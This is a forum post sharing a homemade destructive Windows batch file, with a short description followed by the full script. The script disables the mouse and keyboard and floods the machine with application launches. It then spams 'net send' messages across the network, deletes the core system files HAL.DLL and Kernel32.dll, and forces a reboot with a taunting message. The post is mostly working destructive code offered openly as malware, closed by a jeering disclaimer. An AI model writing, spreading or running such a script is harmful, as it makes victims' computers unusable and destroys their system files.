Heres a little .BAT file i put together after seeing dark bloods batch commands and stuff.
So here it is, heres a brief description of what it does.....
Disables mouse and keyboard, i got the lines from that from dark bloods batch commands.
Slows down the computer by running a lot of applications.
Floods the network with johnnys flood BAT command he posted in funny CMD and VBS commands.
Deletes kernel32.dll and HAL.DLL
Restarts the computer
I wrote the delete and restart because they are easy :)
@echo off
:disable
C:\Windows\RunDLL32.exe mouse,disable
C:\Windows\RunDLL32.exe keyboard,disable
goto SlowDown
:SlowDown
start explorer.exe
start notepad.exe
start iexplore.exe
start taskman.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
start notepad.exe
goto FNetwork
:FNetwork
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
cls
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
goto Kernel
:Kernel
del %SystemRoot%\System32\HAL.DLL
del %SystemRoot%\System32\Kernel32.DLL
goto Reboot
:Reboot
shutdown -r -t 15 -c "You are DOOMED"
pause
If you are dumb enough to actually use this i take no responsibility if you damage your computer in any way. Its your dumb ass fault for doing it i said damn well what it does.
Bookmarks